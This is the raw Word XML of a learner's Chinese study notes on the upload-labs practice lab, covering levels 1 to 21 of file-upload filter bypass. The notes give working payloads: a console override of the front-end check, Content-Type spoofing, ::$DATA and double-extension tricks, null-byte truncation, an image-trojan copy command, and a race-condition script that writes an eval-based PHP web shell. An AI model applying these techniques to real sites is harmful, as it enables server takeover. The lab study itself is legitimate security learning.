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upload的初印象是什么？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它不是注入点的寻找和测试，主要目标是通过文件上传点，上传木马文件；所以核心不是寻找测试，而是绕过拦截。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单一的注入点：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即文件上传点，html中通常为input type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的标签；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标签相应按键对应请求为一个post请求——使用burp拦截这个post请求，里面是主要的操作空间，注入和绕过拦截发生在这里！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好吧！现在可以到</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>第一题</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>了，先尝试拦截！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这一题的拦截是：前端—浏览器脚本拦截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因为通过探索网页，发现如果不是图片类型的文件，讲直接无法构造请求，浏览器会弹窗，浏览器的问题，就是前端的问题。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可以在拦截的post请求里面发现：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------WebKitFormBoundary58EkX3t8XYeQNmjP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Content-Disposition: form-data; name="upload_file"; filename="ced1fd515e4999fb6f7e17c10d9991e0.jpg"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Content-Type: image/jpeg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这个是文件上传post的文件表单头，后面跟着的是文件本身。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filename里面会写文件的名称，是文件的全名。（这是一个经常攻击的地方，也许是拦截依据之一）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Content-Type这是声明文件类型的，这有时也是一个拦截的依据。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另外可以在less-1的html页面最下方看到一个script，是一个检查上传的文件后缀的脚本；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实际提交时，确实也无法提交指定类型以外的文件。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因为这个脚本运行在前端，可以通过：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1、修改浏览器配置，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2、或者直接在前端页面删除掉这个脚本执行的语句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3、也可以burp拦截正确构造的 被允许的post请求，再前端后面修改请求发给后端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2—可以修改html中调用这个函数的标签，这样是可以的！只要找到了。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</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:u w:val="single"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>ctrl+shift+f</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>可以在element页面进行</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:u w:val="single"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>字符串搜索</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>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—也可以修改脚本函数，但是实际上，加载网页后这个脚本就很可能被网页记住了，加载好后修改是没用的；此时必须去</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:u w:val="single"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>console控制台</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>即使修改这个函数才行。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比如输入：checkFile = function() { return true; };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————成了！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3—这个算绕后了，绕后再偷偷改，包得！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第二题：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通过前端网络页面，发现错误提交后，似乎没有额外的请求发出，也没有额外的相应回来，说明这道题很可能还是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:u w:val="single"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>前端拦截</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>！与后端无关。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尝试寻找html文本，发现提交按钮确实有checkFile的调用，但是使用全局搜索没有搜到这个函数的位置？具体调用是：onsubmit="return checkFile()" ——return是正常的。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目前的情况说明：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-&gt;burp绕过注入还行！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-&gt;修改前端代码遇到了点问题。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不管了！继续控制台尝试废掉这个可能的函数！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——也没用！？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似乎也没存在其他位置如选择文件时的拦截，而且明确了是前端的拦截。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错了！</w:t>
      </w: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虽然观察到对象不多不少不变，但是不能排除是对象覆写了；实际情况也是，请求时间变化了，而且提交的一瞬间，请求数突然多了一个又变少，可能是post请求发出了。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那就是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>后端检测</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:u w:val="single"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>了！（本来前端检测就是最简单的）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那么后端它检查的是哪个字段呢，咱们从burp入手，经典表单字段入手。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后端的最简单拦截是——检查post表单字段参数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观察到变化，把Content-Type改成image/jpeg（已知可接受类型）即可。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第三题：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上传错误文件后，发现它作为一个图片强行回显到了网页上，而且看网络中的更新情况，应该是后端接收了的。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但是这题的回显暴露了它的手段：乱改你的文件名，防止你找到调用！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所以我们应该尝试自定义文件名，或者获取这个文件名！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从burp查看，似乎与content-type字段没关系，因为连正确的图片文件也被修改了随机的名字！而且也不是前端改的，前端的配置、函数等也不需要搜索。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虽然从名字来看，前几位有一定规律，但是后6位似乎就是完全随机的！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行，其实这确实是一个问题，现实中是可能需要额外的破解方法的，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>但是这题不是这个问题！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这题是：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:u w:val="none"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>不允许上传.asp,.aspx,.php,.jsp后缀文件！——黑名单拦截（黑名单绕过）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我觉得是后端的锅，拿burp看看？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修改content-tpye字段，没用，看来是检测filename中的后缀的。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黑名单很暴力，直接禁止文件类型确实比较无解，只能说防不胜防。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办法：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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“偷渡”管理员可能漏掉了一些其他的php版本，如php3，也是可以执行的脚本文件</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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“篡改”后面的题目会学到：.htaccess文件可以作为脚本修改已上传的文件的执行方式。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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依赖系统漏洞，网站服务器中的系统配置，可能会把扩展名中的：某些符号、空格等忽略掉，但是上传时的检查没注意这点；也可能通过系统忽略大小写的配置上传如.Php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第四题：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依旧在前端网页中回显了图片文件内容（还顺带路径），而且没修改文件名。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传错误的文件，按照经验，“感觉”还是后端检测！burp看看？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content-type没用，哎感觉还是filename黑名单——而且不告诉你禁止了什么！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尝试1、漏掉的类型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包不行了，确实也不行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尝试2、.htaccess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这个行，但是我只传了一段示例文档，具体怎么构造——我将会在另一个文档说明！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第五题：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依旧回显、依旧路径、依旧不修改、依旧后端检测、依旧filename、依旧没漏。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但是连.htaccess也不行了！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呵呵，那就继续学呗：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黑名单的第3个办法：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利用 Windows 文件名命名的一个经典特性：Windows 在保存文件时，会自动去掉文件名末尾的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>空格（Space）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:u w:val="single"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>点（.）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我们赌它是window服务器，辨认时认不出来，保存时却可以！记住，是 . 和 Space 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等等？为什么不行？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windows只会删除后面的空格和点，只有加在后面才有用的。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但是这里系统还是识别出了后面的点和空格，给我拦截了！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——这里还有玄学：识别出的逻辑，大概率是先删除后面的点和空格，然后再匹配：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这说明什么，我们.和space多嵌套几层，就大概率可以了。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当然可能有完全防死的情况.....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第六题：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highlight w:val="yellow"/>
          <w:u w:val="none"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:highlight w:val="yellow"/>
          <w:u w:val="none"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>距离上次学习有3天了，复习一下：主要是绕过各种拦截，目前遇到过前端拦截，它可以修改浏览器配置，真正的杀招是使用burp拦截后发送；还有后端验证，最简单的是content type字段的检查，非常简单；还有黑名单，但有时没有完全禁止，可以使用其他版本，或者使用htaccess文件进行特殊执行，也可以利用windows的文件保存漏洞，尽管可能有一些防护。拿到一个网页，我们应当进行充分的对错测试，从排除前端的入手，然后到自己熟悉的后端漏洞！就这样吧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上传正确的图片发现，它修改了文件名，这目前不知道怎么破解！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应该是没有前端拦截的，因为checkFile早就给我们干掉了！拿到后端默认修改content type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这题大多数文件类型被拦截，使用windows漏洞时，发现：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s.s么，那么最后必然只剩点后缀，此时能发出去，但是没有后缀名；结合修改名称的操作来看，估计它的执行流程是这样的：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 xml:space="preserve">先按s.s这样的模式删除后缀的s和. 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然后从后面选起，选到最后一个. 并使之后的为扩展名，检查扩展名是否合规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如果不在黑名单内，那么还得修改. 之前的名称为随机名称。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结果是：分析对了，但是没分析到关键点！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黑名单拦截，本质上就是后端对文件名称的一些代码！包括去空格、去点、大小写处理、后缀查询、删特殊字符等。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:u w:val="none"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>这题的关键点是，黑名单拦截中漏掉了</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:u w:val="none"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>大小写处理</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:u w:val="none"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>，这刚好是我没考虑测试的！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对的点是，确实是想到了找到最后一个点用于寻找后缀名，在不修改文件名的题目，点确实很好用，但是在这题，如果没漏掉大小写处理，那么将会很难！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第七题：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依旧绕过前端、绕过content type；估计常规的php扩展名、htaccess扩展名也不允许使用了；其他对文件名的后端处理代码需要测试！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乱改文件名：有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点空格后缀删除：无！--&gt;已经结束了！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大小写处理：有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好像没了，虽然还是不知道怎么找到那个乱改的文件名！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第八题：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依旧第七题；现在检查后端在filename的文章：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乱改文件名：无！ ---&gt;可以乱点和空格了！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点空格后缀删除：有又如何呢？你还是windows！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大小写处理：有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比第七题还爽，后面会有新的东西吗？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第九题：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依旧；现在检查后端在filename的文章：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乱改文件名：有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点空格后缀删除：有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大小写处理：有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--&gt;好的，终于出现了传说中的没有忘记！目前不知道怎么办！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除非它是先删除空格再删除点，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:u w:val="none"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>也就是最后一次删除是删除点</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:u w:val="none"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>，那这是最后的说法了！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很遗憾，是后删除空格！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先大小写处理、再处理后缀、再获取点，进行匹配，最后乱改文件名。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现在是被乱改文件名坑了，现在只能赌——匹配时获取的点不一样了？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不对！我看代码去了——还真是空点空。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获取扩展名，在中间？然后在去空，但这并没有改变“获取点”的威力，只要是最后一次还是删除空格的，加上获取点，就是利用不了windows漏洞。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666根宝告诉我，这一关没有删除特殊字符的语句，这玩意是::$DATA 。它跟在文件扩展名的后面，依旧在保存时被windows忽略！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但它与空格和点的区别在于：它只能紧紧靠着扩展名后面。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而且后端拦截这个办法的代码是：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:u w:val="single"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>整个检查名称，把这个字符串删除掉！</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:u w:val="none"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>所以等于是一旦有了这个逻辑，那么这个方法基本上不用想了！也不用考虑顺序问题了。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--&gt;感觉战略性拆分在常规的情况下也不行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最后构造payload：knight.php::$DATA就可以了。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:hint="default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 xml:space="preserve">以后多检查一个逻辑：是否青蒜::$DATA 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第十题：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依旧；检查后端拦截filename：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修改文件名（获取扩展名）：无！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取消::$DATA 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点空格后缀处理：有，先空格再点，都一次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处理大小写：有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啊？没有扩展名，直接来就行啦！？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哈哈哈哈哈，这题代码出问题了！本来这题是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:u w:val="none"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>白名单</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:u w:val="none"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>的！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highlight w:val="cyan"/>
          <w:u w:val="single"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>那这题算是有点点问题呀。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第十一题：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这题就是replace 禁止的字符串的。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构造payload：filename="knight.pphphp"即可。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那么怎么测试出来的呢？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注意到：它没有乱改文件名，但是使用之前的办法，获取到的的结果是没有后缀的。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或者说，主动构造这样的payload。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第十二题：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依旧；现在检查后端代码情况。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后缀空格点处理：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修改文件名（提取后缀）：有！很难受了！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处理::$DATA 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处理大小写：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字符串替换：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还没测完发现是白名单拦截，凭借现在的水平，我能想到的是借助后端代码可能的处理功能。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没有注释类型的东西，感觉不太行呀。问根宝！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好的！根宝说是“</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:u w:val="none"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>截断绕过</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:u w:val="none"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>”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原理是利用机器使用特定符号识别字符串结尾的特性，从而忽略后面的内容。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并且上传的路径也能决定文件名称！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具体符号是：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%00（GET/URL）——其实是00截断，但是url编码会把%干掉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00（POST表单）——注意是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:u w:val="single"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>表单</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:u w:val="none"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>路径</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:highlight w:val="red"/>
          <w:u w:val="none"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:highlight w:val="red"/>
          <w:u w:val="none"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>终极情况：没办法被解析为带一个截断符号时，直接去hex修改——可以先用一个+作为标识（二进制2b）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highlight w:val="red"/>
          <w:u w:val="none"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:highlight w:val="red"/>
          <w:u w:val="none"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>这个终极情况，在这题，post请求带get参数中就是！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highlight w:val="red"/>
          <w:u w:val="none"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="red"/>
          <w:u w:val="none"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>谁说的！</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:highlight w:val="red"/>
          <w:u w:val="none"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>这个截断符号直接把报文都</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="red"/>
          <w:u w:val="none"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>斩杀</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:highlight w:val="red"/>
          <w:u w:val="none"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>了！</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr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暂时不要相信上面那个↑</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs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/>
          <w:bCs/>
          <w:highlight w:val="green"/>
          <w:u w:val="none"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>新终极情况：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上面的对了一半！如果在请求头中使用hex截断，确实会爆炸！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但是可以在post请求体中使用hex截断，因为这里是用长度识别内容的，截断符号不会卡http解析！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聚合一下，正式写入时。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注意：截断符号的使用位置，应当是后端不检查的文件路径中；而不是filename字段中，因为那样会让后端检测也迟到截断符号，此处filename应当只是一个伪装。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关键：寻找到文件路径的提交方式。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——此方法在php5以上版本被修理！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爽点：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:u w:val="none"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>针对路径下手</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:u w:val="none"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>这个思路可以干掉所有的黑名单拦截！并且防止乱改文件名。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爽个屁，被环境搞了，下一题！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第十三题：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依旧白名单。试试路径？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还真是路径——而且在post里面，按照理论，应该采用00结尾！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依旧nginx发狂！现在试试apache？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apache也死，算了吧！</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:u w:val="single"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>至少会对路径下手了！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第十四题：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这题的要求很明确，学习图片马的上传方法！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图片马，作为一种应对白名单拦截的办法，并且能够一定程度上对战文件内容检查。大致内容是把php木马藏在图片里，伪装为图片；且在调用此后门时，需要特定触发方式。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只上传还是简单的！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使用payload：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copy piggy.jpg /b + knight.php /a sword.jpg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完成创建了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什么都不用就上传了！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现在使用：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文件包含漏洞了！都不用嗅探了！直接告诉你在那！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文件名乱改？它不是回显了么？直接前端看。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遇到了：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解析错误，说明遇到了php语法错误，但这时已经说明执行了php代码了！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这可能是jpg图片中含有&lt;?类型的乱码，让php把它当成php语句开头了！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办法是换一个图片，或者换一种图片格式！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其实图片越小，这种可能越少！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第十五题：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依旧啊！图片马图图的！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十六题去！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第十六题：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就是换了个检查开头的函数，本质检查开头，我们的图片马秒杀！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第十七题：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依旧图片马，上传是上传了，但是我们的木马代码被删除了！！变成了普通的图片！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根宝说，这是使用了“后端二次渲染”把我代码刷掉了。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具体在2！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md这也有“字符背刺”啊！但这个背刺是针对脚本编写者说的，具体不说了。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最后改了一下注入的php代码，就可以了，最后也是成功了。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第十八题：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依旧乱改文件名，依旧白名单，看看路径怎么说，拦截之！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没有可以修改的路径接口，那就图片马！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默认使用GD的就行了，依旧上传那个图片马！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上传成功了！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但是没有找到文件包含漏洞的使用点？！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——这题不是图片马了！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这题介绍了一个概念“代码审计”——详见2！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第十八题的代码审计发现——对于任意类型的文件，它都是先上传，然后再检测是否符合白名单，不符合再删除。这说明在上传和删除中间这极短的时间，我们是有机会执行php代码的；考虑到最后上传的php文件会被干掉，所以我们可以构造一个创建php文件的php文件，在删除前执行创建的操作就行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具体操作是：高频次提交请求，上传php文件；再高频词提交请求调用上传的php文件。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那么问题来了！它乱改了文件名！？吗？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这就是代码审计，发现他是检查后再改名，所以上传到删除的一瞬间，名字还是原来的名字！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构造mkshell.php文件，写入：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&lt;?php fputs(fopen('shell.php','w'),'&lt;?php @eval($_POST[cmd]);?&gt;'); ?&gt;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使用burp反复提交！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构造另一个intruder，反复请求：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fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:u w:val="none"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> HYPERLINK "http://upload-labs:52778/Pass-18/upload/mkshell.php" </w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:u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lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>http://upload-labs:52778/upload/mkshell.php</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:u w:val="none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结果——用了python脚本才成功哈哈，原理一样的。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第十九题：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提示：&amp;this是对象的self！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可以看到，在这个对象中，upload函数返回case的状态码，而且upload函数确实是进行一系列检查的函数。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感觉是上传到临时文件夹，然后检查目标目录、文件扩展名、文件大小等最后再进行一个改名。所以还是上一题的逻辑，在被检查扩展名删除前，竞争执行代码，而且名字还为你保留呢！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所以关键是寻找到上传的临时文件夹在哪！？找不到啊！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根宝解答——这个临时文件夹只是一个上传保存文件的底层默认逻辑，也就是前面18道题都是这样的，只是没显式写出来罢了......    ——所以别管这个啊！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这题检查后再移动，确实也是一种企业级的写法。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所以这题的关键点在于，移动前就删除了，所以是不能直接像18题那样上传php文件的。我们利用这个宽泛的白名单，让他通过扩展名检查，来到upload中，在重命名前，文件处于一种可找到状态，所以这就是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:u w:val="none"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>那一个极短的瞬间</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:u w:val="none"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>！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总结：关键点有俩——1是使用可通过白名单的木马文件，2在重命名之前条件竞争执行它。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不要想着使用条件竞争，条件竞争自然就出来了。。。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根宝提示：特殊的文件类型——HTML，它可以被浏览器读取内容，php代码也会执行</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs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何以味，html估计是不被浏览器执行了，那我竞争个毛啊！？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现在根宝叫我利用系统执行漏洞，孩子们算了吧！！！！！！！！！！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第二十题：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代码审计发现：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它是一个黑名单拦截，而且似乎没做什么处理。先拦截，再移动。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并且还能指定文件名，并且它拦截的逻辑是那个指定的文件名，最后也不乱重命名。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现在唯一的问题是——pathinfo函数是一个黑盒，它可能会对指定文件的扩展名进行提取和一些常规的操作：但我感觉点点点就差不多了！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还真是孩子们！代码审计让我知道什么是白盒什么是黑盒，那就很爽了！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等下纯黑盒还得测试是用哪个名字检查、是黑名单还是白名单等。黑盒完全用测试猜后台代码，肯定是不如白盒爽的。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第二十一题：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这题纯黑盒怎么样！？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发现原文件名也会检查、可选文件名也会检查。谁是黑的谁是白的？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怎么感觉两个都是白的。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欸，指定了文件名，但是指定的文件名也需要检查，似乎不能使用截断符号。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确实也没有显式路径选项。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图片马没有文件包含漏洞。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审计一下：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呵呵，检查content type的来了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可以为空，不为空使用可选文件名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检查不是数组？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变小写扩展名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explode-按dot拆分文件名成为数组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end取最后的一块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reset获取第一个元素，然后与最后一个元素（扩展名）拼接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然后上传了，最后才上传，那么竞争不了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我感觉关键应该是字符串截断，可能php处理函数中，有不认识截断符号的。不对！感觉有了也没用啊——我累了孩子们，看看明天还剩下什么吧，明天是没Linux的，是一个速通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54D00"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="1F454D0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5838"/>
    <w:rsid w:val="017659F6"/>
    <w:rsid w:val="01EB7BB3"/>
    <w:rsid w:val="02254895"/>
    <w:rsid w:val="02C50B9B"/>
    <w:rsid w:val="02F74BED"/>
    <w:rsid w:val="03F35D89"/>
    <w:rsid w:val="0469124B"/>
    <w:rsid w:val="051060E7"/>
    <w:rsid w:val="07434552"/>
    <w:rsid w:val="081D2FF5"/>
    <w:rsid w:val="08914E9E"/>
    <w:rsid w:val="09937F44"/>
    <w:rsid w:val="0A3B7458"/>
    <w:rsid w:val="0C277EFD"/>
    <w:rsid w:val="0C892520"/>
    <w:rsid w:val="0D7A2C98"/>
    <w:rsid w:val="0D99235D"/>
    <w:rsid w:val="0DA770F4"/>
    <w:rsid w:val="121F1DDC"/>
    <w:rsid w:val="12CD73E7"/>
    <w:rsid w:val="14F83E22"/>
    <w:rsid w:val="16460E1F"/>
    <w:rsid w:val="188C65D3"/>
    <w:rsid w:val="1A273DF6"/>
    <w:rsid w:val="1A78230D"/>
    <w:rsid w:val="1E112162"/>
    <w:rsid w:val="1EEE40CF"/>
    <w:rsid w:val="22207409"/>
    <w:rsid w:val="227B07F7"/>
    <w:rsid w:val="22F22FE5"/>
    <w:rsid w:val="23AB4992"/>
    <w:rsid w:val="248655F9"/>
    <w:rsid w:val="24925A8E"/>
    <w:rsid w:val="28A94DC4"/>
    <w:rsid w:val="294F5552"/>
    <w:rsid w:val="2CF55A3F"/>
    <w:rsid w:val="2E4814FD"/>
